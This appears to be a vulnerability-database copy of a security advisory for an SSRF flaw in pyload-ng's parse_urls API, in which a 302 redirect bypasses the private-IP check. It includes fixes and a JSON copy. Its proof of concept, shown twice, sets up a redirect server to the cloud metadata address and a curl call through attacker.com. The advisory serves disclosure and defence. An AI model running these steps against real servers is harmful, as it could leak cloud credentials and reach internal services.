GHSA-8RP3-XC6W-5QP5

Vulnerability from github – Published: 2026-05-21 19:54 – Updated: 2026-05-21 19:54
VLAI
Summary
pyload-ng: SSRF via HTTP Redirect Bypass in parse_urls API
Details

Summary

The SSRF mitigation added in commit 33c55da for GHSA-7gvf-3w72-p2pg is incomplete. The PREREQFUNCTION-based private IP check was correctly applied to HTTPChunk (download path) but not to HTTPRequest (used by the parse_urls API). An authenticated attacker can supply a URL pointing to an attacker-controlled server that responds with a 302 redirect to an internal/private IP address, bypassing the is_global_host() check on the initial URL.

Details

The parse_urls API method validates the initial URL hostname:

# src/pyload/core/api/__init__.py:600-604
if url:
    urlp = urlparse(url)
    hostname = urlp.hostname
    if urlp.scheme in ("http", "https") and hostname and is_global_host(hostname):
        page = get_url(url)

get_url() is imported from request_factory.py and creates an HTTPRequest with default settings:

# src/pyload/core/network/request_factory.py:58-64
def get_url(self, *args, **kwargs):
    with HTTPRequest(None, self.get_options()) as h:
        rep = h.load(*args, **kwargs)
    return rep

HTTPRequest.__init__ sets allow_private_ip = True by default:

# src/pyload/core/network/http/http_request.py:75
self.allow_private_ip = True

The init_handle() method enables redirect following:

# src/pyload/core/network/http/http_request.py:117-118
self.c.setopt(pycurl.FOLLOWLOCATION, 1)
self.c.setopt(pycurl.MAXREDIRS, 10)

The _pre_request_callback that should block redirects to private IPs is a no-op when allow_private_ip is True:

# src/pyload/core/network/http/http_request.py:574-582
def _pre_request_callback(self, conn_primary_ip, conn_local_ip, conn_primary_port, conn_local_port):
    if not self.allow_private_ip and not is_global_address(conn_primary_ip):
        return pycurl.PREREQFUNC_ABORT
    return pycurl.PREREQFUNC_OK

The fix at commit 33c55da correctly set allow_private_ip = False in HTTPChunk (http_chunk.py:136) for the download path, but HTTPRequest used by RequestFactory.get_url() retains the default of True, leaving the parse_urls API unprotected against redirect-based SSRF.

PoC

# Step 1: Start a redirect server on attacker-controlled host
python3 -c "
from http.server import BaseHTTPRequestHandler, HTTPServer
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/')
        self.end_headers()
HTTPServer(('0.0.0.0', 8888), H).serve_forever()
"

# Step 2: Authenticated user with ADD permission calls parse_urls
curl -X POST 'http://pyload-host:8000/api/parse_urls' \
  -H 'Cookie: session=<valid_session>' \
  -d 'url=http://attacker.com:8888/redirect'

# Expected flow:
# 1. is_global_host('attacker.com') -> True (passes validation)
# 2. get_url() creates HTTPRequest with allow_private_ip=True
# 3. pycurl fetches attacker.com:8888, receives 302 -> http://169.254.169.254/latest/meta-data/
# 4. _pre_request_callback runs but skips check (allow_private_ip=True)
# 5. pycurl follows redirect to cloud metadata endpoint
# 6. Response body parsed by RE_URLMATCH, any URLs in metadata returned to attacker

Impact

An authenticated attacker with ADD permission can perform SSRF against:

  • Cloud metadata endpoints (AWS IMDSv1 at 169.254.169.254, GCP, Azure) — potentially leaking IAM credentials, instance metadata, and secrets
  • Internal services on private networks (e.g., 10.x.x.x, 172.16.x.x, 192.168.x.x)
  • Localhost services (127.0.0.1) running on the pyload server

Data exfiltration is partially limited by the RE_URLMATCH regex filter (only URL-like strings from the response body are returned), but cloud metadata responses often contain URLs or URL-like paths that match this pattern. The REDIR_PROTOCOLS setting limits redirects to HTTP/HTTPS only.

Recommended Fix

Set allow_private_ip = False in RequestFactory.get_url():

# src/pyload/core/network/request_factory.py
def get_url(self, *args, **kwargs):
    with HTTPRequest(None, self.get_options()) as h:
        h.allow_private_ip = False  # Prevent SSRF via redirects
        rep = h.load(*args, **kwargs)
    return rep

Alternatively, change the default in HTTPRequest.__init__ to False:

# src/pyload/core/network/http/http_request.py:75
self.allow_private_ip = False

The second approach is more defensive (secure by default), but may require auditing other callers that legitimately need to access private IPs. The first approach is the targeted fix.

Severity
5.0 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.0b3.dev100"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46561"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T19:54:32Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe SSRF mitigation added in commit `33c55da` for GHSA-7gvf-3w72-p2pg is incomplete. The `PREREQFUNCTION`-based private IP check was correctly applied to `HTTPChunk` (download path) but not to `HTTPRequest` (used by the `parse_urls` API). An authenticated attacker can supply a URL pointing to an attacker-controlled server that responds with a 302 redirect to an internal/private IP address, bypassing the `is_global_host()` check on the initial URL.\n\n## Details\n\nThe `parse_urls` API method validates the initial URL hostname:\n\n```python\n# src/pyload/core/api/__init__.py:600-604\nif url:\n    urlp = urlparse(url)\n    hostname = urlp.hostname\n    if urlp.scheme in (\"http\", \"https\") and hostname and is_global_host(hostname):\n        page = get_url(url)\n```\n\n`get_url()` is imported from `request_factory.py` and creates an `HTTPRequest` with default settings:\n\n```python\n# src/pyload/core/network/request_factory.py:58-64\ndef get_url(self, *args, **kwargs):\n    with HTTPRequest(None, self.get_options()) as h:\n        rep = h.load(*args, **kwargs)\n    return rep\n```\n\n`HTTPRequest.__init__` sets `allow_private_ip = True` by default:\n\n```python\n# src/pyload/core/network/http/http_request.py:75\nself.allow_private_ip = True\n```\n\nThe `init_handle()` method enables redirect following:\n\n```python\n# src/pyload/core/network/http/http_request.py:117-118\nself.c.setopt(pycurl.FOLLOWLOCATION, 1)\nself.c.setopt(pycurl.MAXREDIRS, 10)\n```\n\nThe `_pre_request_callback` that should block redirects to private IPs is a no-op when `allow_private_ip` is `True`:\n\n```python\n# src/pyload/core/network/http/http_request.py:574-582\ndef _pre_request_callback(self, conn_primary_ip, conn_local_ip, conn_primary_port, conn_local_port):\n    if not self.allow_private_ip and not is_global_address(conn_primary_ip):\n        return pycurl.PREREQFUNC_ABORT\n    return pycurl.PREREQFUNC_OK\n```\n\nThe fix at commit `33c55da` correctly set `allow_private_ip = False` in `HTTPChunk` (http_chunk.py:136) for the download path, but `HTTPRequest` used by `RequestFactory.get_url()` retains the default of `True`, leaving the `parse_urls` API unprotected against redirect-based SSRF.\n\n## PoC\n\n```bash\n# Step 1: Start a redirect server on attacker-controlled host\npython3 -c \"\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nclass H(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(302)\n        self.send_header(\u0027Location\u0027, \u0027http://169.254.169.254/latest/meta-data/\u0027)\n        self.end_headers()\nHTTPServer((\u00270.0.0.0\u0027, 8888), H).serve_forever()\n\"\n\n# Step 2: Authenticated user with ADD permission calls parse_urls\ncurl -X POST \u0027http://pyload-host:8000/api/parse_urls\u0027 \\\n  -H \u0027Cookie: session=\u003cvalid_session\u003e\u0027 \\\n  -d \u0027url=http://attacker.com:8888/redirect\u0027\n\n# Expected flow:\n# 1. is_global_host(\u0027attacker.com\u0027) -\u003e True (passes validation)\n# 2. get_url() creates HTTPRequest with allow_private_ip=True\n# 3. pycurl fetches attacker.com:8888, receives 302 -\u003e http://169.254.169.254/latest/meta-data/\n# 4. _pre_request_callback runs but skips check (allow_private_ip=True)\n# 5. pycurl follows redirect to cloud metadata endpoint\n# 6. Response body parsed by RE_URLMATCH, any URLs in metadata returned to attacker\n```\n\n## Impact\n\nAn authenticated attacker with ADD permission can perform SSRF against:\n\n- **Cloud metadata endpoints** (AWS IMDSv1 at `169.254.169.254`, GCP, Azure) \u2014 potentially leaking IAM credentials, instance metadata, and secrets\n- **Internal services** on private networks (e.g., `10.x.x.x`, `172.16.x.x`, `192.168.x.x`)\n- **Localhost services** (`127.0.0.1`) running on the pyload server\n\nData exfiltration is partially limited by the `RE_URLMATCH` regex filter (only URL-like strings from the response body are returned), but cloud metadata responses often contain URLs or URL-like paths that match this pattern. The `REDIR_PROTOCOLS` setting limits redirects to HTTP/HTTPS only.\n\n## Recommended Fix\n\nSet `allow_private_ip = False` in `RequestFactory.get_url()`:\n\n```python\n# src/pyload/core/network/request_factory.py\ndef get_url(self, *args, **kwargs):\n    with HTTPRequest(None, self.get_options()) as h:\n        h.allow_private_ip = False  # Prevent SSRF via redirects\n        rep = h.load(*args, **kwargs)\n    return rep\n```\n\nAlternatively, change the default in `HTTPRequest.__init__` to `False`:\n\n```python\n# src/pyload/core/network/http/http_request.py:75\nself.allow_private_ip = False\n```\n\nThe second approach is more defensive (secure by default), but may require auditing other callers that legitimately need to access private IPs. The first approach is the targeted fix.",
  "id": "GHSA-8rp3-xc6w-5qp5",
  "modified": "2026-05-21T19:54:32Z",
  "published": "2026-05-21T19:54:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-8rp3-xc6w-5qp5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pyload-ng: SSRF via HTTP Redirect Bypass in parse_urls API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.